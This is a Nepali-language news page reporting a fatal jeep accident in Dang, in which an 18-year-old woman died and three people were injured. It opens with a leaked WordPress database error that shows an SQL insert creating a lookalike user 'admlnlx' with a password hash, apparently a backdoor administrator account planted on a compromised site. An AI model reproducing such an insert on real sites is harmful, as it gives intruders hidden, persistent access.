WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BE1rYuCViV6/jj.O7hheDEVc9gX.nv1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 14:36:14', '', 'admlnlx', 'admlnlx')
दाङ,माघ २५ –
बेला गाविस – ७ खैरी खोलामा सोमबार राति जीप दुर्घटना हुँदा एक जनाको मृत्यु भएको छ। भे १ ज ५३ नम्बरको जीप अनियन्त्रित भई दुर्घटना हुँदा दाङ राजपुर–३ की १८ वर्षीया सपना चौधरीको मृत्यु भएको हो। अरु ३ जना घाइते भएको र उनीहरूको राप्ती उपक्षेत्रीय अस्पताल घोराहीमा उपचार भइरहेको दाङ प्रहरीले जनाएको छ।